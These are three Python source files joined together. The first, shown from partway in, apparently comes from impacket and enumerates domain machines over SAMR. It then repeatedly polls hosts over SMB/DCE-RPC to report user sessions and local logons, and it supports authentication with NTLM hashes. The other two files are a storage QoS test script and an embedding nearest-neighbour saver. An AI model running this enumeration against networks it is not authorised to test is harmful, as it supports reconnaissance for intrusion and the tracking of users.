s = socket.create_connection((machine, 445), 2)
global myIP
myIP = s.getsockname()[0]
s.close()
machinesAliveQueue.put(machine)
except Exception, e:
logging.debug('%s: not alive (%s)' % (machine, e))
pass
else:
logging.debug('%s: alive!' % machine)
deadMachines.remove(machine)
if stopEvent.is_set():
done = True
break
logging.debug('up: %d, down: %d, total: %d' % (origLen-len(deadMachines), len(deadMachines), origLen))
if singlePass is True:
done = True
if not done:
sleep(10)
# Do we have some new deadMachines to add?
while machinesDownQueue.empty() is False:
deadMachines.append(machinesDownQueue.get())
class USERENUM:
    """Polls a set of target hosts over DCE-RPC and reports session and
    logon activity.

    For each live target it periodically enumerates SMB sessions (SRVS,
    \\PIPE\\srvsvc) and locally logged-on users (WKST, \\PIPE\\wkssvc,
    admin required), printing the differences against the previous
    snapshot, optionally filtered to a list of users of interest.
    """

    def __init__(self, username='', password='', domain='', hashes=None, aesKey=None, doKerberos=False, options=None):
        """Store credentials and parsed command-line options.

        hashes, when given, is an 'LMHASH:NTHASH' string that overrides
        the password for NTLM authentication.
        """
        self.__username = username
        self.__password = password
        self.__domain = domain
        self.__lmhash = ''
        self.__nthash = ''
        self.__aesKey = aesKey
        self.__doKerberos = doKerberos
        self.__kdcHost = options.dc_ip
        self.__options = options
        # machines in scope (names/addresses), filled by getTargets()
        self.__machinesList = list()
        # per-target state: cached DCE bindings, admin flag, and the last
        # session / logged-in snapshots used to compute diffs
        self.__targets = dict()
        self.__filterUsers = None
        self.__targetsThreadEvent = None
        self.__targetsThread = None
        # budget of DCE-RPC connections we are allowed to keep open
        self.__maxConnections = int(options.max_connections)
        if hashes is not None:
            self.__lmhash, self.__nthash = hashes.split(':')

    def getDomainMachines(self):
        """Fill self.__machinesList with the domain's machine accounts,
        enumerated over SAMR (workstation trust accounts only).
        """
        if self.__kdcHost is not None:
            domainController = self.__kdcHost
        elif self.__domain is not '':
            # NOTE(review): 'is not' compares identity, not equality; this
            # works only because CPython interns the empty string — should
            # be `!= ''`.
            domainController = self.__domain
        else:
            raise Exception('A domain is needed!')
        logging.info('Getting machine\'s list from %s' % domainController)
        rpctransport = transport.SMBTransport(domainController, 445, r'\samr', self.__username, self.__password,
                                              self.__domain, self.__lmhash, self.__nthash, self.__aesKey,
                                              doKerberos=self.__doKerberos, kdcHost = self.__kdcHost)
        dce = rpctransport.get_dce_rpc()
        dce.connect()
        dce.bind(samr.MSRPC_UUID_SAMR)
        try:
            resp = samr.hSamrConnect(dce)
            serverHandle = resp['ServerHandle']
            resp = samr.hSamrEnumerateDomainsInSamServer(dce, serverHandle)
            domains = resp['Buffer']['Buffer']
            logging.info("Looking up users in domain %s" % domains[0]['Name'])
            resp = samr.hSamrLookupDomainInSamServer(dce, serverHandle,domains[0]['Name'] )
            resp = samr.hSamrOpenDomain(dce, serverHandle = serverHandle, domainId = resp['DomainId'])
            domainHandle = resp['DomainHandle']
            status = STATUS_MORE_ENTRIES
            enumerationContext = 0
            # page through the account database; STATUS_MORE_ENTRIES means
            # another page is available
            while status == STATUS_MORE_ENTRIES:
                try:
                    resp = samr.hSamrEnumerateUsersInDomain(dce, domainHandle, samr.USER_WORKSTATION_TRUST_ACCOUNT,
                                                            enumerationContext=enumerationContext)
                except DCERPCException, e:
                    if str(e).find('STATUS_MORE_ENTRIES') < 0:
                        raise
                    resp = e.get_packet()
                for user in resp['Buffer']['Buffer']:
                    # drop the trailing character of the account name
                    # (machine accounts end in '$')
                    self.__machinesList.append(user['Name'][:-1])
                    logging.debug('Machine name - rid: %s - %d'% (user['Name'], user['RelativeId']))
                enumerationContext = resp['EnumerationContext']
                status = resp['ErrorCode']
        except Exception, e:
            raise e
        dce.disconnect()

    def getTargets(self):
        """Build self.__machinesList from -target / -targets, or by
        enumerating the domain when neither was given.
        """
        logging.info('Importing targets')
        if self.__options.target is None and self.__options.targets is None:
            # We need to download the list of machines from the domain
            self.getDomainMachines()
        elif self.__options.targets is not None:
            for line in self.__options.targets.readlines():
                self.__machinesList.append(line.strip(' \r\n'))
        else:
            # Just a single machine
            self.__machinesList.append(self.__options.target)
        logging.info("Got %d machines" % len(self.__machinesList))

    def filterUsers(self):
        """Build the user filter from -user / -users; None disables filtering."""
        if self.__options.user is not None:
            self.__filterUsers = list()
            self.__filterUsers.append(self.__options.user)
        elif self.__options.users is not None:
            # Grab users list from a file
            self.__filterUsers = list()
            for line in self.__options.users.readlines():
                self.__filterUsers.append(line.strip(' \r\n'))
        else:
            self.__filterUsers = None

    def run(self):
        """Main loop: resolve the target scope, then repeatedly poll every
        live target for sessions and logged-in users, pruning targets that
        error out. Runs until interrupted, or once when -noloop was given.
        """
        self.getTargets()
        self.filterUsers()
        #self.filterGroups()
        # Up to here we should have figured out the scope of our work
        self.__targetsThreadEvent = Event()
        if self.__options.noloop is False:
            # Start a separate thread checking the targets that are up
            self.__targetsThread = Thread(target=checkMachines, args=(self.__machinesList,self.__targetsThreadEvent))
            self.__targetsThread.start()
        else:
            # Since it's gonna be a one shoot test, we need to wait till it finishes
            checkMachines(self.__machinesList,self.__targetsThreadEvent, singlePass=True)
        while True:
            # Do we have more machines to add?
            while machinesAliveQueue.empty() is False:
                machine = machinesAliveQueue.get()
                logging.debug('Adding %s to the up list' % machine)
                self.__targets[machine] = {}
                self.__targets[machine]['SRVS'] = None
                self.__targets[machine]['WKST'] = None
                self.__targets[machine]['Admin'] = True
                self.__targets[machine]['Sessions'] = list()
                self.__targets[machine]['LoggedIn'] = set()
            # keys() returns a list in Python 2, so deleting entries from
            # self.__targets inside this loop is safe
            for target in self.__targets.keys():
                try:
                    self.getSessions(target)
                    self.getLoggedIn(target)
                except (SessionError, DCERPCException), e:
                    # We will silently pass these ones, might be issues with Kerberos, or DCE
                    if str(e).find('LOGON_FAILURE') >=0:
                        # For some reason our credentials don't work there,
                        # taking it out from the list.
                        logging.error('STATUS_LOGON_FAILURE for %s, discarding' % target)
                        del(self.__targets[target])
                    elif str(e).find('INVALID_PARAMETER') >=0:
                        del(self.__targets[target])
                    elif str(e).find('access_denied') >=0:
                        # Can't access the target RPC call, most probably a Unix host
                        # taking it out from the list
                        del(self.__targets[target])
                    else:
                        logging.info(str(e))
                    pass
                except KeyboardInterrupt:
                    raise
                except Exception, e:
                    #import traceback
                    #traceback.print_exc()
                    if str(e).find('timed out') >=0:
                        # Most probably this site went down. taking it out
                        # ToDo: add it back to the list of machines to check in
                        # the separate thread - DONE
                        del(self.__targets[target])
                        machinesDownQueue.put(target)
                    else:
                        # These ones we will report
                        logging.error(e)
                    pass
            if self.__options.noloop is True:
                break
            logging.debug('Sleeping for %s seconds' % self.__options.delay)
            logging.debug('Currently monitoring %d active targets' % len(self.__targets))
            sleep(int(self.__options.delay))

    def getSessions(self, target):
        """Enumerate SMB sessions on *target* via SRVS and print the diffs
        (new / closed sessions) against the previous snapshot stored in
        self.__targets[target]['Sessions'].
        """
        if self.__targets[target]['SRVS'] is None:
            # no cached binding for this target yet: build a fresh one
            stringSrvsBinding = r'ncacn_np:%s[\PIPE\srvsvc]' % target
            rpctransportSrvs = transport.DCERPCTransportFactory(stringSrvsBinding)
            if hasattr(rpctransportSrvs, 'set_credentials'):
                # This method exists only for selected protocol sequences.
                rpctransportSrvs.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash,
                                                 self.__nthash, self.__aesKey)
                rpctransportSrvs.set_kerberos(self.__doKerberos, self.__kdcHost)
            dce = rpctransportSrvs.get_dce_rpc()
            dce.connect()
            dce.bind(srvs.MSRPC_UUID_SRVS)
            self.__maxConnections -= 1
        else:
            dce = self.__targets[target]['SRVS']
        try:
            resp = srvs.hNetrSessionEnum(dce, '\x00', NULL, 10)
        except Exception, e:
            if str(e).find('Broken pipe') >= 0:
                # The connection timed-out. Let's try to bring it back next round
                self.__targets[target]['SRVS'] = None
                self.__maxConnections += 1
                return
            else:
                raise
        if self.__maxConnections < 0:
            # Can't keep this connection open. Closing it
            dce.disconnect()
            self.__maxConnections = 0
        else:
            self.__targets[target]['SRVS'] = dce
        # Let's see who created a connection since last check
        tmpSession = list()
        printCRLF = False
        for session in resp['InfoStruct']['SessionInfo']['Level10']['Buffer']:
            # presumably the wire strings are NUL-terminated ([:-1] drops the
            # terminator) and the client name starts with '\\' ([2:]) —
            # TODO confirm against impacket's srvs definitions
            userName = session['sesi10_username'][:-1]
            sourceIP = session['sesi10_cname'][:-1][2:]
            key = '%s\x01%s' % (userName, sourceIP)
            myEntry = '%s\x01%s' % (self.__username, myIP)
            tmpSession.append(key)
            if not(key in self.__targets[target]['Sessions']):
                # Skipping myself
                if key != myEntry:
                    self.__targets[target]['Sessions'].append(key)
                    # Are we filtering users?
                    if self.__filterUsers is not None:
                        if userName in self.__filterUsers:
                            print "%s: user %s logged from host %s - active: %d, idle: %d" % (
                                target, userName, sourceIP, session['sesi10_time'], session['sesi10_idle_time'])
                            printCRLF = True
                    else:
                        print "%s: user %s logged from host %s - active: %d, idle: %d" % (
                            target, userName, sourceIP, session['sesi10_time'], session['sesi10_idle_time'])
                        printCRLF = True
        # Let's see who deleted a connection since last check
        # NOTE(review): deleting by index while enumerating shifts the
        # remaining items, so the entry following a removed one is skipped
        # this round; it is picked up on the next pass.
        for nItem, session in enumerate(self.__targets[target]['Sessions']):
            userName, sourceIP = session.split('\x01')
            if session not in tmpSession:
                del(self.__targets[target]['Sessions'][nItem])
                # Are we filtering users?
                if self.__filterUsers is not None:
                    if userName in self.__filterUsers:
                        print "%s: user %s logged off from host %s" % (target, userName, sourceIP)
                        printCRLF=True
                else:
                    print "%s: user %s logged off from host %s" % (target, userName, sourceIP)
                    printCRLF=True
        if printCRLF is True:
            print

    def getLoggedIn(self, target):
        """Enumerate interactively logged-on users on *target* via WKST and
        print the diffs against the previous snapshot. Requires admin; when
        access is denied the target is flagged and skipped from then on.
        """
        if self.__targets[target]['Admin'] is False:
            return
        if self.__targets[target]['WKST'] is None:
            # no cached binding for this target yet: build a fresh one
            stringWkstBinding = r'ncacn_np:%s[\PIPE\wkssvc]' % target
            rpctransportWkst = transport.DCERPCTransportFactory(stringWkstBinding)
            if hasattr(rpctransportWkst, 'set_credentials'):
                # This method exists only for selected protocol sequences.
                rpctransportWkst.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash,
                                                 self.__nthash, self.__aesKey)
                rpctransportWkst.set_kerberos(self.__doKerberos, self.__kdcHost)
            dce = rpctransportWkst.get_dce_rpc()
            dce.connect()
            dce.bind(wkst.MSRPC_UUID_WKST)
            self.__maxConnections -= 1
        else:
            dce = self.__targets[target]['WKST']
        try:
            resp = wkst.hNetrWkstaUserEnum(dce,1)
        except Exception, e:
            if str(e).find('Broken pipe') >= 0:
                # The connection timed-out. Let's try to bring it back next round
                self.__targets[target]['WKST'] = None
                self.__maxConnections += 1
                return
            elif str(e).upper().find('ACCESS_DENIED'):
                # NOTE(review): find() returns -1 (truthy) when the substring
                # is absent, so this branch triggers for ANY exception that
                # is not a broken pipe; a `>= 0` is almost certainly missing.
                # We're not admin, bye
                dce.disconnect()
                self.__maxConnections += 1
                self.__targets[target]['Admin'] = False
                return
            else:
                raise
        if self.__maxConnections < 0:
            # Can't keep this connection open. Closing it
            dce.disconnect()
            self.__maxConnections = 0
        else:
            self.__targets[target]['WKST'] = dce
        # Let's see who logged in locally since last check
        tmpLoggedUsers = set()
        printCRLF = False
        for session in resp['UserInfo']['WkstaUserInfo']['Level1']['Buffer']:
            # presumably the wire strings are NUL-terminated ([:-1] drops
            # the terminator) — TODO confirm against impacket's wkst definitions
            userName = session['wkui1_username'][:-1]
            logonDomain = session['wkui1_logon_domain'][:-1]
            key = '%s\x01%s' % (userName, logonDomain)
            tmpLoggedUsers.add(key)
            if not(key in self.__targets[target]['LoggedIn']):
                self.__targets[target]['LoggedIn'].add(key)
                # Are we filtering users?
                if self.__filterUsers is not None:
                    if userName in self.__filterUsers:
                        print "%s: user %s\\%s logged in LOCALLY" % (target,logonDomain,userName)
                        printCRLF=True
                else:
                    print "%s: user %s\\%s logged in LOCALLY" % (target,logonDomain,userName)
                    printCRLF=True
        # Let's see who logged out since last check
        # iterate a copy: entries are removed from the set while walking it
        for session in self.__targets[target]['LoggedIn'].copy():
            userName, logonDomain = session.split('\x01')
            if session not in tmpLoggedUsers:
                self.__targets[target]['LoggedIn'].remove(session)
                # Are we filtering users?
                if self.__filterUsers is not None:
                    if userName in self.__filterUsers:
                        print "%s: user %s\\%s logged off LOCALLY" % (target,logonDomain,userName)
                        printCRLF=True
                else:
                    print "%s: user %s\\%s logged off LOCALLY" % (target,logonDomain,userName)
                    printCRLF=True
        if printCRLF is True:
            print

    def stop(self):
        """Signal the aliveness-checker thread (if any) to terminate."""
        if self.__targetsThreadEvent is not None:
            self.__targetsThreadEvent.set()
# Process command-line arguments.
# NOTE: this file is Python 2 (`print` statements, `except Exception, e`).
if __name__ == '__main__':
    print version.BANNER
    # Init the example's logger theme
    logger.init()
    parser = argparse.ArgumentParser()
    parser.add_argument('identity', action='store', help='[domain/]username[:password]')
    parser.add_argument('-user', action='store', help='Filter output by this user')
    parser.add_argument('-users', type=argparse.FileType('r'), help='input file with list of users to filter to output for')
    #parser.add_argument('-group', action='store', help='Filter output by members of this group')
    #parser.add_argument('-groups', type=argparse.FileType('r'), help='Filter output by members of the groups included in the input file')
    parser.add_argument('-target', action='store', help='target system to query info from. If not specified script will '
                        'run in domain mode.')
    parser.add_argument('-targets', type=argparse.FileType('r'), help='input file with targets system to query info '
                        'from (one per line). If not specified script will run in domain mode.')
    parser.add_argument('-noloop', action='store_true', default=False, help='Stop after the first probe')
    parser.add_argument('-delay', action='store', default = '10', help='seconds delay between starting each batch probe '
                        '(default 10 seconds)')
    parser.add_argument('-max-connections', action='store', default='1000', help='Max amount of connections to keep '
                        'opened (default 1000)')
    parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
    group = parser.add_argument_group('authentication')
    group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
    group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
    group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
                       '(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the '
                       'ones specified in the command line')
    group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication '
                       '(128 or 256 bits)')
    group.add_argument('-dc-ip', action='store',metavar = "ip address", help='IP Address of the domain controller. If '
                       'ommited it use the domain part (FQDN) specified in the target parameter')
    # No arguments at all: show usage instead of failing on the missing identity.
    if len(sys.argv)==1:
        parser.print_help()
        sys.exit(1)
    options = parser.parse_args()
    if options.debug is True:
        logging.getLogger().setLevel(logging.DEBUG)
    else:
        logging.getLogger().setLevel(logging.INFO)
    import re
    # Split identity into [domain/]username[:password]; groups('') turns
    # missing groups into empty strings rather than None (except domain).
    domain, username, password = re.compile('(?:(?:([^/:]*)/)?([^:]*)(?::([^@]*))?)?').match(options.identity).groups(
        '')
    try:
        if domain is None:
            domain = ''
        # Only prompt for a password when no other credential source was given.
        if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
            from getpass import getpass
            password = getpass("Password:")
        if options.aesKey is not None:
            # Supplying an AES key implies Kerberos authentication.
            options.k = True
        executer = USERENUM(username, password, domain, options.hashes, options.aesKey, options.k, options)
        executer.run()
    except Exception, e:
        if logging.getLogger().level == logging.DEBUG:
            import traceback
            traceback.print_exc()
        logging.error(e)
        # NOTE(review): if USERENUM(...) itself raised, `executer` is unbound
        # here and this call raises NameError instead — confirm and guard.
        executer.stop()
    except KeyboardInterrupt:
        logging.info('Quitting.. please wait')
        executer.stop()
    sys.exit(0)
|
vdbench_qos.py | import vdbench
import initiator
import json
import lib
import target
from datetime import datetime
from time import sleep
import asyncio
import threading
import pos
# TEST_0#_0#=["Test name",
#     [limit_type(reset, bw, iops), limit_how(rate, value), limit_value(%, per volume value)],
#     [ ... ]]
# Each testcase is a name followed by one or more throttle steps that are
# applied in order against the measured base performance.
TEST_01_01 = ["Reset Throttling", ["reset", "", ""]]
TEST_01_02 = ["Reset Throttling", ["bw", "value", "100"],
              ["reset", "", ""]]
TEST_02_01 = ["Throttle Max BW to 10% of Base Performance", ["bw", "rate", "10"]]
TEST_02_02 = ["Throttle Max IOPS to 10% of Base Performance", ["iops", "rate", "10"]]
TEST_03_01 = ["Throttle Max BW to 50% of Base Performance", ["bw", "rate", "50"]]
TEST_03_02 = ["Throttle Max IOPS to 50% of Base Performance", ["iops", "rate", "50"]]
TEST_04_01 = ["Throttle Max BW 90% of Base Performance", ["bw", "rate", "90"]]
TEST_04_02 = ["Throttle MAX IOPS 90% of Base Performance", ["iops", "rate", "90"]]
TEST_05_01 = ["Throttle Max BW 150% of Base Performance", ["bw", "rate", "150"]]
TEST_05_02 = ["Throttle Max IOPS 150% of Base Performance", ["iops", "rate", "150"]]
TEST_06_01 = ["Throttle Max BW to Min Performance", ["bw", "value", "10"]]
TEST_06_02 = ["Throttle Max IOPS to Min Performance", ["iops", "value", "10"]]
TEST_07_01 = ["Throttle Both Max BW and Iops", ["bw", "rate", "20"],
              ["iops", "rate", "50"],
              ["bw", "rate", "50"],
              ["iops", "rate", "30"]]
# Per-volume throttling: second element lists volume ranges, third the values.
TEST_08_01 = ["Throttle Each Volume with Different Value", ["bw", ["3"], ["50"]],
              ["iops", ["1-2", "4-5"], ["10", "20"]],
              ["bw", ["3"], ["50"]]]
# Vdbench run definitions (one workload per line); parentheses are escaped
# because the lines are passed through a shell to vdbench.
rd_list = [r"seq_w,wd=seq,iorate=max,elapsed=33,interval=3,warmup=3,pause=5,forxfersize=\(128k\),forrdpct=\(0\),forthreads=\(4\)",
           r"seq_r,wd=seq,iorate=max,elapsed=33,interval=3,warmup=3,pause=5,forxfersize=\(128k\),forrdpct=\(100\),forthreads=\(4\)",
           r"rand_w,wd=rand,iorate=max,elapsed=36,interval=3,warmup=3,pause=5,forxfersize=\(4k\),forrdpct=\(0\),forthreads=\(128\)",
           r"rand_r,wd=rand,iorate=max,elapsed=36,interval=3,warmup=3,pause=5,forxfersize=\(4k\),forrdpct=\(100\),forthreads=\(128\)"
           ]
def GetTestcaseList():
    """Return the ordered list of QoS testcase definitions to execute."""
    return [
        TEST_01_01, TEST_01_02,
        TEST_02_01, TEST_02_02,
        TEST_03_01, TEST_03_02,
        TEST_04_01, TEST_04_02,
        TEST_05_01, TEST_05_02,
        TEST_06_01, TEST_06_02,
        TEST_07_01,
        TEST_08_01,
    ]
def GetWorkloadInfos():
    """Return [workload_names, rd_list]: run-definition names and raw lines.

    The name of each workload is the token before the first comma of its
    vdbench run definition.
    """
    workload_names = [rd.split(',', 1)[0] for rd in rd_list]
    return [workload_names, rd_list]
def play(json_targets, json_inits, json_scenario):
    """Run the QoS throttling test matrix with vdbench.

    json_targets / json_inits / json_scenario are parsed scenario-config
    sections.  Prepares one test target and its initiators, measures base
    performance, then applies every testcase's throttle steps per workload
    and checks that throughput was actually limited.
    """
    lib.printer.green(f"\n -- '{__name__}' has began --")
    raw_date = datetime.now()
    # NOTE(review): now_date is computed but never used below.
    now_date = raw_date.strftime("%y%m%d_%H%M%S")
    skip_workload = False
    # validate arguments
    if 0 == len(json_targets):
        lib.printer.red(" TargetError: At least 1 target has to exist")
        return
    if 0 == len(json_inits):
        lib.printer.red(" InitiatorError: At least 1 initiator has to exist")
        return
    # target prepare
    targets = {}
    for json_target in json_targets:
        try:
            target_obj = target.manager.Target(json_target)
            target_name = json_target["NAME"]
        except KeyError:
            lib.printer.red(" TargetError: Target KEY is invalid")
            return
        if not target_obj.Prepare():
            skip_workload = True
            break
        targets[target_name] = target_obj
    # init prepare
    initiators = {}
    # NOTE(review): if the first target's Prepare() failed, `targets` is empty
    # and next(iter(targets)) raises StopIteration — confirm skip handling.
    test_target = targets[next(iter(targets))]
    for json_init in json_inits:
        try:
            init_obj = initiator.manager.Initiator(json_init)
            init_name = json_init["NAME"]
        except KeyError:
            lib.printer.red(" InitiatorError: Initiator KEY is invalid")
            return
        if not init_obj.Prepare(True, test_target.subsystem_list):
            skip_workload = True
            break
        initiators[init_name] = init_obj
    # check auto generate
    if "yes" != test_target.use_autogen:
        lib.printer.red(f"{__name__} [Error] check [TARGET][AUTO_GENERATE][USE] is 'yes' ")
        skip_workload = True
    # NOTE(review): GetWorkloadInfos() is called twice, and this local rd_list
    # shadows the module-level rd_list constant.  Also, skip_workload set above
    # does not actually skip the workload below — it only changes the final
    # message; confirm intended.
    workload_list = GetWorkloadInfos()[0]
    rd_list = GetWorkloadInfos()[1]
    lib.printer.green(f" Qos Test With Vdbench Start")
    testcase = GetTestcaseList()
    first_init_key = list(initiators.keys())[0]
    first_init = initiators[first_init_key]
    # create vd file & run
    first_init_vdbench = vdbench.manager.Vdbench(first_init.name, first_init.id, first_init.pw, first_init.nic_ssh, first_init.vdbench_dir, json_scenario['OUTPUT_DIR'])
    first_init_vdbench.opt["size"] = "8g"
    # rd_idx -1 = all workloads; this run establishes the base performance.
    first_init_vdbench.CreateVdFile(initiators, rd_list, -1, True)
    first_init_vdbench.run(True)
    first_init_vdbench.CopyVdbenchTotalResult(True, workload_list)
    base_perf = {}
    base_perf = first_init_vdbench.GetBasePerformance(workload_list) # iops, MB/s
    # run each test for each workload
    # make vd file with only 1 workload
    workload_count = len(workload_list)
    for rd_idx in range(0, workload_count):
        workload_name = workload_list[rd_idx]
        prev_expected_value = {} # iops, MB/s
        base_bw = prev_expected_value["bw"] = float(base_perf[workload_name]["bw"])
        base_iops = prev_expected_value["iops"] = float(base_perf[workload_name]["iops"])
        base_iops /= 1000.0 # kiops
        print("\n")
        lib.printer.green(f" === <Base Performance> IOPS: {base_iops} k, BW: {base_bw}MB/sec === ")
        # Create Vdbench File
        print(f" Run: {rd_list[rd_idx]}")
        vd_disk_names = first_init_vdbench.CreateVdFile(initiators, rd_list, rd_idx)
        for test in testcase:
            print("\n")
            lib.printer.green(f" **** TEST NAME : {test[0]} ****")
            # Each sc is one throttle step of the testcase.
            for sc in test[1:]:
                print(f" {sc}")
                validty = pos.qos.CheckTestValidity(test[0], sc)
                if validty is False:
                    print(f" Invalid test : {sc}")
                    continue
                # A list in sc[1] means per-volume limits, otherwise global.
                applyAllVolume = (type(sc[1]) is not list)
                # Get Qos Command Option
                limit = {}
                # case1) {"type": , "how": , "value": } case2) {"type: ", "1-2": 10, "4-5": 20}
                limit = pos.qos.GetQosCommandOption(sc, base_perf[workload_name])
                # Run Vdbench
                vdbench_thread = threading.Thread(target=first_init_vdbench.run)
                vdbench_thread.start()
                sleep(1)
                # Set Throttling
                expected_value = 0
                if applyAllVolume is True:
                    expected_value = pos.qos.SetQosToAllVolumes(test_target, limit) # kiops, MB/s
                    if limit["type"] == "iops" and expected_value != -1:
                        expected_value *= 1000
                    # A reset, or a limit above base performance, means no
                    # throttling is expected at all.
                    if limit["type"] == "reset" or expected_value > base_perf[workload_name][limit["type"]]:
                        expected_value = 0
                else:
                    pos.qos.SetQosToEachVolumes(test_target, limit)
                sleep(1)
                # Wait for vdbench till done
                vdbench_thread.join(timeout=60)
                # Check Result
                throttle_success = False
                if applyAllVolume is True:
                    first_init_vdbench.CopyVdbenchTotalResult(False, [workload_name])
                    result_file = json_scenario['OUTPUT_DIR'] + "/" + workload_name + ".json"
                    [throttle_success, prev_expected_value] = pos.qos.CheckQosThrottled(result_file, limit["type"], expected_value, prev_expected_value, base_perf[workload_name])
                else:
                    for key in initiators:
                        init = initiators[key]
                        volume_id_list = init.GetVolumeIdOfDevice(vd_disk_names[key])
                        throttle_success = pos.qos.CheckEachVolumeThrottled(key, limit, vd_disk_names[key], first_init_vdbench, workload_name, volume_id_list)
                if throttle_success is False:
                    lib.printer.red(f" Failed to throttle to {expected_value}")
                else:
                    lib.printer.green(f" Throttling success")
                print("")
            # Reset Qos After Each Test
            limit = {"type": "reset", "how": "", "value": 0}
            pos.qos.SetQosToAllVolumes(test_target, limit)
            prev_expected_value["bw"] = float(base_perf[workload_name]["bw"])
            prev_expected_value["iops"] = float(base_perf[workload_name]["iops"])
    lib.printer.green(f" Qos Test With Vdbench End")
    # init wrapup
    for key in initiators:
        initiators[key].Wrapup(True, test_target.subsystem_list)
    # target warpup
    for key in targets:
        if not targets[key].Wrapup():
            targets[key].ForcedExit()
    if skip_workload:
        lib.printer.red(f" -- '{__name__}' unexpected done --\n")
    else:
        lib.printer.green(f" -- '{__name__}' successfully done --\n")
|
nn_saver.py | '''
Get the top k nearest neighbors for a set of embeddings and save to a file
'''
import multiprocessing as mp
import tensorflow as tf
import numpy as np
import codecs
import os
from nearest_neighbors import NearestNeighbors
import pyemblib
from hedgepig_logger import log
class _SIGNALS:
    """Sentinel message types passed over the inter-process result queue."""
    HALT = -1  # tells the writer process to stop consuming and exit
    COMPUTE = 1
def KNearestNeighbors(emb_arr, node_IDs, top_k, neighbor_file, threads=2, batch_size=5, completed_neighbors=None):
    '''Compute the top_k nearest neighbors of every embedding in emb_arr
    and write them to neighbor_file (one CSV row per embedding).

    Parameters:
        emb_arr :: embedding vectors, indexed in node-ID order
        node_IDs :: node IDs aligned with the rows of emb_arr
        top_k :: number of neighbors to compute per point
        neighbor_file :: output path for the CSV neighbor listing
        threads :: total process count (threads-1 workers + 1 writer)
        batch_size :: number of points each worker scores at once
        completed_neighbors :: optional set of already-written indices to
            skip (used to resume a partial run)
    '''
    # set up threads
    log.writeln('1 | Thread initialization')
    all_indices = list(range(len(emb_arr)))
    if completed_neighbors:
        # Resuming: drop indices whose neighbors were already written.
        all_indices = [ix for ix in all_indices if ix not in completed_neighbors]
        log.writeln(' >> Filtered out {0:,} completed indices'.format(len(emb_arr) - len(all_indices)))
        log.writeln(' >> Filtered set size: {0:,}'.format(len(all_indices)))
    index_subsets = _prepareForParallel(all_indices, threads-1, data_only=True)
    nn_q = mp.Queue()
    nn_writer = mp.Process(target=_nn_writer, args=(neighbor_file, node_IDs, nn_q))
    computers = [
        mp.Process(target=_threadedNeighbors, args=(index_subsets[i], emb_arr, batch_size, top_k, nn_q))
        for i in range(threads - 1)
    ]
    nn_writer.start()
    log.writeln('2 | Neighbor computation')
    # BUGFIX: the original called util.parallelExecute(computers), but `util`
    # is never imported in this module, so this line raised NameError at
    # runtime.  Start and join the worker processes directly instead.
    for proc in computers:
        proc.start()
    for proc in computers:
        proc.join()
    # All workers done: tell the writer to drain and shut down.
    nn_q.put(_SIGNALS.HALT)
    nn_writer.join()
def _prepareForParallel(data, threads, data_only=False):
'''Chunks list of data into disjoint subsets for each thread
to process.
Parameters:
data :: the list of data to split among threads
threads :: the number of threads to split for
'''
perthread = int(len(data) / threads)
threadchunks = []
for i in range(threads):
startix, endix = (i*perthread), ((i+1)*perthread)
# first N-1 threads handle equally-sized chunks of data
if i < threads-1:
endix = (i+1)*perthread
threadchunks.append((startix, data[startix:endix]))
# last thread handles remainder of data
else:
threadchunks.append((startix, data[startix:]))
if data_only: return [d for (ix, d) in threadchunks]
else: return threadchunks
def _nn_writer(neighborf, node_IDs, nn_q):
    '''Writer-process loop: consume (index, neighbors) results from nn_q
    and stream them to neighborf as CSV rows until a HALT sentinel arrives.
    '''
    # BUGFIX: open the output in a with-block so the file is flushed and
    # closed when the writer terminates (the original leaked the handle).
    with open(neighborf, 'w') as stream:
        stream.write('# File format is:\n# <word vocab index>,<NN 1>,<NN 2>,...\n')
        result = nn_q.get()
        log.track(message=' >> Processed {0}/{1:,} samples'.format('{0:,}', len(node_IDs)), writeInterval=50)
        while result != _SIGNALS.HALT:
            (ix, neighbors) = result
            # Row = node ID of the point, then its neighbors' node IDs.
            stream.write('%s\n' % ','.join([
                str(d) for d in [
                    node_IDs[ix], *[
                        node_IDs[nbr]
                        for nbr in neighbors
                    ]
                ]
            ]))
            log.tick()
            result = nn_q.get()
    log.flushTracker()
def _threadedNeighbors(thread_indices, emb_arr, batch_size, top_k, nn_q):
    '''Worker-process loop: score batches of indices against the embedding
    matrix and push (index, neighbor_list) pairs onto nn_q.
    '''
    sess = tf.Session()
    grph = NearestNeighbors(sess, emb_arr)
    for start in range(0, len(thread_indices), batch_size):
        batch = thread_indices[start:start + batch_size]
        nn = grph.nearestNeighbors(batch, top_k=top_k, no_self=True)
        for point, neighbors in zip(batch, nn):
            nn_q.put((point, neighbors))
def writeNodeMap(emb, f):
    '''Write a <node ID> TAB <vocab term> map for emb's keys to file f.

    Terms are stripped and empty ones dropped; IDs start at 1 in case 0
    is reserved in node2vec.
    '''
    ordered = tuple(k.strip() for k in emb.keys() if len(k.strip()) > 0)
    with codecs.open(f, 'w', 'utf-8') as stream:
        for node_id, v in enumerate(ordered, start=1):
            stream.write('%d\t%s\n' % (node_id, v))
def readNodeMap(f, as_ordered_list=False):
    '''Read a <node ID> TAB <term> map from file f.

    Returns {node_id: term}, or the terms sorted by node ID when
    as_ordered_list is True.
    '''
    node_map = {}
    with codecs.open(f, 'r', 'utf-8') as stream:
        for line in stream:
            node_id, v = (s.strip() for s in line.split('\t'))
            node_map[int(node_id)] = v
    if as_ordered_list:
        return [node_map[k] for k in sorted(node_map.keys())]
    return node_map
# Command-line entry point: compute k nearest neighbors for an embedding
# file and save them to a CSV listing keyed by node ID.
if __name__ == '__main__':
    def _cli():
        # Parse command-line options; returns (embedding_file, options).
        import optparse
        parser = optparse.OptionParser(usage='Usage: %prog EMB1')
        parser.add_option('-t', '--threads', dest='threads',
            help='number of threads to use in the computation (min 2, default: %default)',
            type='int', default=2)
        parser.add_option('-o', '--output', dest='outputf',
            help='file to write nearest neighbor results to (default: %default)',
            default='output.csv')
        parser.add_option('--vocab', dest='vocabf',
            help='file to read ordered vocabulary from (will be written if does not exist yet)')
